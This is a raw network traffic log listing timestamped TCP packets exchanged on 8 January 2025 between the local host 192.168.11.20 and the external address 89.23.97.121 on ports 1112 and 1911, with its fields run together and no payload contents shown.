                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.574846983 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.575002909 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.575170994 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.575340986 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.575506926 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.839488029 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.839498997 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.839767933 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.839889050 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.839950085 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.840286970 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.840814114 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.840823889 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.841075897 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.841609001 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.841690063 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.842170954 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.842180014 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.842701912 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.843015909 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.843255043 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.843507051 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.843601942 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.843873978 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.844074965 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.844316959 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.844532967 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.844897032 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.845285892 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.845504045 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.845560074 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.845674038 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.845789909 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.845807076 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.845993042 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.846021891 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.846139908 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.846585989 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.846875906 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.847098112 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.847412109 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.847640991 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.847884893 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.848155975 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.848401070 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.848908901 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.849261045 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.849268913 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.849772930 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.850502014 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.850509882 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.850997925 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.851075888 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.851296902 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.851469994 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.851638079 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.851804018 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.851973057 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.116012096 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.116292000 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.116580963 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.116590977 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.117103100 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.117114067 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.117495060 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.117968082 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.117978096 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.120213032 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.120229959 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.120493889 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.676367998 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.676369905 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.676482916 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.676512957 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.676681042 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.676848888 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.676851988 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.677015066 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.677094936 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.677397966 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.678052902 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.678330898 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.678338051 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.678755999 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.678848028 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.678958893 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.679219007 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.679491997 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.680025101 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.680033922 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.680198908 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.680759907 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.680943012 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.681390047 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.681782961 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.682030916 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.682311058 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.682477951 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.682643890 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.682786942 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.682955980 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.946868896 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.946981907 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.947258949 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.947478056 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.947839022 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.948045015 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.948276043 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.948534966 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.948847055 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.948854923 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.950715065 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.951255083 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.951262951 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.951472998 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.951725960 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.951735020 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.952085018 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.952092886 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.952346087 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.952646017 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.952652931 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.952903986 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.953069925 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.953114986 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.953123093 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.953232050 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.953402996 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.953572989 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.953577995 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.953686953 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.953944921 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.953953981 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.954790115 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.954797983 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.955013990 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.955327988 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.955595016 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.955877066 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.956105947 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.956423044 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.957082987 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.957195044 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.957719088 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.958139896 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.958148003 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.958391905 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.958631039 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.958785057 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.958947897 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.959100008 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:36.959264040 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.223536968 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.223764896 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.224029064 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.224327087 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.224615097 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.224623919 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.224901915 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.225191116 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.225199938 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.937031031 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.937172890 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.937200069 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.937249899 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.937386036 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.937402010 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.937550068 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.937634945 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.937726021 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.937752962 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.937995911 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.208750010 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.208957911 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.209086895 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.209194899 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.209265947 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.209273100 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.209359884 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.209381104 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.209480047 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.209532022 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.209585905 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.209698915 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.209727049 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.209851980 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.209940910 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.210026026 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.210059881 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.210160971 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.210232973 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.210283041 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.210397005 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.210516930 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.210519075 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.210633993 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.210714102 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.210747957 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.210874081 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.210962057 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.210999966 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.211143017 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.211246967 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.211292982 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.211344957 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.211451054 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.211466074 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.211577892 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.211685896 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.211724997 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.211834908 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.211854935 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.211920023 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.212043047 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.212105036 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.212155104 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.212268114 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.212301016 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.212407112 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.212505102 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.212557077 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.212666988 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.212737083 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.212845087 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.212862015 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.212976933 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.213093042 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.213171959 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.213202953 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.213258982 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.213368893 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.213625908 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.482470036 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.482537985 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.482660055 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.482702971 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.482777119 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.482867956 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.482973099 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.483040094 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.483088970 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.483211040 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.483323097 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.483393908 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.483479977 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.483594894 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.483702898 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.483716965 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.483788967 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.483875036 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.483906031 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.484021902 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.757153034 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.757251978 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.757324934 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.757376909 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.757435083 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.757483959 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.757611036 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.757739067 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.757788897 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.757875919 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.757953882 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.757987022 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.758101940 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.758187056 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.758304119 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.758318901 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.758429050 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.758505106 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.758536100 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.758609056 CET497491911192.168.11.2089.23.97.121
